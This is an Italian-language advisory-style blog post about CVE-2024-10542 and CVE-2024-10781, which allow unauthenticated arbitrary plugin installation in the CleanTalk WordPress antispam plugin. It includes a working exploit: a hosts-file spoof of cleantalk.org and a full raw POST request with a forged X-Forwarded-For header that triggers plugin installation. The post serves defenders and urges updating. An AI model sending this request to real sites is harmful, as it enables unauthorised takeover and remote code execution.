
WordPress Protezione antispam, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 è vulnerabile a Installazione non autenticata di plugin arbitrari
Le informazioni fornite in questo documento relative a CVE-2024-10542 sono solo a scopo di apprendimento ed educazione. Non incoraggiamo né autorizziamo l'uso di queste informazioni per scopi dannosi, inclusi ma non limitati a sfruttamento, manomissione di sistemi o altre attività illegali.
In un panorama digitale sempre più complesso, garantire la sicurezza dei siti web è fondamentale per molti proprietari. Recentemente sono state scoperte due vulnerabilità critiche che rappresentano una minaccia significativa per i siti WordPress. Queste vulnerabilità riguardano il noto plugin CleanTalk, che fornisce protezione antispam, misure antispam e un firewall. Cosa rende questa situazione ancora più urgente? Approfondiamo! Due vulnerabilità tracciate come CVE-2024-10542 e CVE-2024-10781 potrebbero consentire a un utente malintenzionato non autenticato di installare e attivare plugin malevoli su siti vulnerabili. Ciò non solo mette a rischio la reputazione del sito, ma apre anche la strada all'esecuzione di codice remoto. Con un punteggio CVSS di 9,8 su 10, è evidente che queste vulnerabilità rientrano nella categoria ad alto pericolo. Secondo Wordfence, entrambe le vulnerabilità riguardano un problema di bypass dell'autorizzazione che potrebbe consentire a un attore malintenzionato di installare e attivare plugin arbitrari. Questo potrebbe quindi aprire la strada all'esecuzione di codice remoto se il plugin attivato è a sua volta vulnerabile.
Innanzitutto, gli utenti malintenzionati imposteranno il file hosts sui propri sistemi operativi:
127.0.0.1 cleantalk.org
dopodiché invieranno una richiesta come questa:
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
spbc_remote_call_action=install_plugin&plugin_name=apbct
La sicurezza informatica è una responsabilità condivisa da ogni proprietario di sito. Mantenendo i plugin aggiornati e rimanendo vigili sulle potenziali vulnerabilità, possiamo proteggere i nostri siti da attacchi malevoli. Assicurati di aver aggiornato CleanTalk all'ultima versione e di effettuare controlli periodici sugli altri plugin per garantire la massima sicurezza. Ricorda, piccoli passi possono prevenire disastri significativi!
Allah, Muhammad SAW, mikemyers, Markdown Monster, la mia famiglia, tu?